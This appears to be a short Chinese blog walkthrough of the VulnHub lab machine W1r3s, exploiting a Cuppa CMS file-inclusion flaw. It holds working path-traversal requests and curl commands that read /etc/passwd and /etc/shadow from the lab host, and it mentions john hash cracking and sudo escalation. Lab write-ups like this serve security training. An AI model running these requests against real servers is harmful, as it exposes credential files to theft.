Featured image of post W1e3s

W1e3s

vulnhub靶场之W1e3s

要求

在/root目录下找到flag

信息收集

主机探测

端口扫描

扫目录

搜索关于Cuppa CMS 框架的相关漏洞,找到一个Local/Remote File Inclusion (本地/远程包含漏洞)
https://www.exploit-db.com/exploits/25971
根据里面的内容,尝试下面的代码,但是无果。

1
http://192.168.42.131/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

使用curl利用LFI漏洞获取信息 curl相关用法

获取**/etc/passwd**信息

1
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.42.131/administrator/alerts/alertConfigField.php

获取**/etc/shadow**信息

1
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.42.131/administrator/alerts/alertConfigField.php

root,www-data,w1r3s的密码

john爆破,只能爆出w1r3s的密码

在情理之中

渗透提权

sudo提权

直接一个sudo提权结束了

总结

1.LFI漏洞

2.curl LFI漏洞

3.读取/etc/passwd和/etc/shadow

4.john爆破

5.sudo提权

最后更新于 Mar 03, 2025 15:27 +0800
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计